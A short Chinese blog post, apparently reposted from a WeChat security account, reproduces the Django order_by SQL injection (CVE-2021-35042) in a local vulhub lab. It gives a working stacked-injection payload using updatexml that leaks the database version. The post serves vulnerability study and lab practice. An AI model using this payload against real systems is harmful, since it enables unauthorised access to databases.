Django SQL注入漏洞(CVE-2021-35042)快速复现

admin 2022年10月29日08:18:39评论52 views字数 639阅读2分7秒阅读模式

前言:

Django在2021年7月1日发布了一个安全更新,修复了在QuerySet底下的order_by函数中存在的SQL注入漏洞

正文:

这里使用vulhub,不会的可以参考前文,选择目录然后启动:

Django  SQL注入漏洞(CVE-2021-35042)快速复现

使用启动命令启动,然后我们访问一下

你的ip:8000/vuln/?order=1

Django  SQL注入漏洞(CVE-2021-35042)快速复现

我们构造一下order=-id,这样会产生id降序的结果

Django  SQL注入漏洞(CVE-2021-35042)快速复现

这里可以使用堆叠注入来完成。

我们构造语句:

?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23

提交,其中vuln_collectionvuln应用下的模型Collection,这里语句是出现版本号。

http://192.168.119.136:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

Django  SQL注入漏洞(CVE-2021-35042)快速复现

这里成功出现,完成注入。

近期公众号运营时间会比较紧,作为个人公众号忙的时候就会发文较少,请大家见谅,可能会发一些比较简单的学习教程来填补空缺。大家多关注公众号的最新推文哦。


Django  SQL注入漏洞(CVE-2021-35042)快速复现




扫描二维码关注我们吧!



微信公众号:白安全组

qq群:70844080

网址:www.wangehacker.cn



原文始发于微信公众号(白安全组):Django SQL注入漏洞(CVE-2021-35042)快速复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日08:18:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Django SQL注入漏洞(CVE-2021-35042)快速复现http://cn-sec.com/archives/1376739.html

发表评论

匿名网友 填写信息